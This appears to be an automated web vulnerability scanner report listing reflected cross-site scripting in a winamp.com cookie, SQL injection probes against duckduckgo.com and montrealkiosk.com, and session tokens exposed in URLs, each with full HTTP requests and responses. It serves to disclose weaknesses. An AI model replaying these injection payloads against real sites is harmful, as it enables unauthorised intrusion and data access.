<html><body><img src="http://REDACTED/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetMicrosoftCookie(%22AA002%22, %221297806090-110178561e5e4"><a>1e9fb9cf9c8%22)" width="1" height="1" border="0" />
...[SNIP]...

3.311. http://www.winamp.com/ [countryCookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=USef6c8"-alert(1)-"2de3f40c518; s_pers=%20s_getnr%3D1298828698586-New%7C1361900698586%3B%20s_nrgvo%3DNew%7C1361900698588%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 71696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<script type="text/javascript">Common.cntCode="USef6c8"-alert(1)-"2de3f40c518";</script>
...[SNIP]...

3.312. http://www.winamp.com/media-player/en [countryCookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /media-player/en

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media-player/en HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=USff2bf"-alert(1)-"2712191debe

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 46321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<script type="text/javascript">Common.cntCode="USff2bf"-alert(1)-"2712191debe";</script>
...[SNIP]...

3.313. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /skin/slick-redux/222084

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin/slick-redux/222084 HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=US4db17"-alert(1)-"8eb02fd3069; s_pers=%20s_getnr%3D1298828716004-New%7C1361900716004%3B%20s_nrgvo%3DNew%7C1361900716004%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-main%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/skin/slick-redux/222084%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 34378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<script type="text/javascript">Common.cntCode="US4db17"-alert(1)-"8eb02fd3069";</script>
...[SNIP]...

4. SQL statement in request parameter  previous  next
There are 2 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.



4.1. http://duckduckgo.com/d.js  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://duckduckgo.com
Path:   /d.js

Request

GET /d.js?q=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&t=D&l=us-en&p=1&s=20 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 03:08:56 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Tue, 01 Mar 2011 03:08:55 GMT
Cache-Control: no-cache
Content-Length: 16975

var dnd20=[{"a":"... OUT NUMBER&#x29; IS BEGIN endofpipe := 0; pipe_returncode := <b>DBMS_PIPE.RECEIVE_MESSAGE</b> ... January 5th, 07:34 AM: <b>Select</b> Statement: inet: 1: January 3rd, 09:57 AM","
...[SNIP]...

4.2. http://www.montrealkiosk.com/directory.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.montrealkiosk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:03:03 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 1212

mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND list
...[SNIP]...

5. Session token in URL  previous  next
There are 67 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.


5.1. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitevents/

Request

GET /tracking.aspx/submitevents/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&Session=25aa86a5-ea98-45f3-a174-e3469a6e00b9&callback=this.altTracker.onEventSubmitAck&Events=%5B%7B%22EventID%22%3A%221%22%2C%22EventTime%22%3A%22%2FDate(1298762332514)%2F%22%2C%22Asset%22%3A%22http%3A%2F%2Fwebcontent.alterian.com%2Four-product%2F%7Chttp%3A%2F%2Fwebcontent.alterian.com%2Four-product%2F%22%2C%22Value%22%3A%22%22%7D%5D&noCacheIE=1298762332515 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/our-product/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:18:37 GMT
Content-Length: 49

this.altTracker.onEventSubmitAck({"Result":"1"});

5.2. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitsession/

Request

GET /tracking.aspx/submitsession/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&callback=this.altTracker.onSessionSubmitAck&timeoffset=360&scrres=1920%20x%201200&username=&trackedsite=alterian-content-management.com&ref=unknown&noCacheIE=1298762278213 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:19:56 GMT
Last-Modified: Sat, 26 Feb 2011 23:19:56 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:19:56 GMT
Content-Length: 171

this.altTracker.onSessionSubmitAck({"Session":"92492fe7-9302-471f-8fc0-5b0c350c45f7","SessionDurationInMinutes":"15","NumofEventsinaSubmit":"30","SubmitDuration":"5000"});

5.3. http://bad-behavior.ioerror.us/2005/05/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/05/

Request

GET /2005/05/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762145+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
nt and ongoing availability. That&#8217;s just the nature of the system we have right now. If you would like to contribute to the further development of Bad Behavior and Bad Behavior Blackhole, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=1wPQMgK-GLJjYMK3cbTugBf2MWU5fAC4JN8zgX2qzee-McmrvSNMtv-yq1m&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">donate</a>
...[SNIP]...

5.4. http://bad-behavior.ioerror.us/2005/06/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/06/

Request

GET /2005/06/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762144+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 22500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=5eEMZMmYZuLbUBvCnH3BEoSb4YklNv-Kc4ZHowHPlbDpuHd_TqZq4s1XhbG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=-EOgSVmyPHXmeAagKBcH3BG70ZJVKTrQhyCvIwhneqtH1lLp3DeZJnBYrsq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.5. http://bad-behavior.ioerror.us/2005/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/07/

Request

GET /2005/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762144+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 15855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.6. http://bad-behavior.ioerror.us/2005/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/08/

Request

GET /2005/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762143+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 41340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Enn2fSL7ofd3-nCAwKfStbdmNa8NmTrfaWT_vVSZpbkxH1XTMUtfAGMKnRK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=9meqMUtsNAw4dxpGS6CSAVdQTiHwGc6CnyJCzvjrQCVordZNNyDrTOZ3c7G&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.7. http://bad-behavior.ioerror.us/2005/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/09/

Request

GET /2005/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762143+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Enn2fSL7ofd3-nCAwKfStbdmNa8NmTrfaWT_vVSZpbkxH1XTMUtfAGMKnRK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.8. http://bad-behavior.ioerror.us/2005/10/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/10/

Request

GET /2005/10/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762142+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 40011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
<p>I have hundreds of comments and trackback pings from users all over who have virtually eliminated their spam problems with Bad Behavior. And every so often, someone does click the nice <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ULbkgjQ4hl46TIlBdkKpL7s_5KRaVRS94dlvN1ro4igRE2QLtaZBIy8dxt4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">PayPal button</a>
...[SNIP]...
<p>So what I&#8217;m going to do here is outline my roadmap for Bad Behavior 2.0, invite you to comment on it, and if you want to see it come about sooner rather than later, to <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ULbkgjQ4hl46TIlBdkKpL7s_5KRaVRS94dlvN1ro4igRE2QLtaZBIy8dxt4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">vote with your dollars, pounds, euros, or whatever you have</a>
...[SNIP]...
<p>Without any further <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ULbkgjQ4hl46TIlBdkKpL7s_5KRaVRS94dlvN1ro4igRE2QLtaZBIy8dxt4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contributions</a>
...[SNIP]...
<p>If you think this roadmap looks good, and want to accelerate the development of Bad Behavior, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=ULbkgjQ4hl46TIlBdkKpL7s_5KRaVRS94dlvN1ro4igRE2QLtaZBIy8dxt4&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute financially</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Enn2fSL7ofd3-nCAwKfStbdmNa8NmTrfaWT_vVSZpbkxH1XTMUtfAGMKnRK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...

5.9. http://bad-behavior.ioerror.us/2005/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2005/11/

Request

GET /2005/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762141+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 17684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
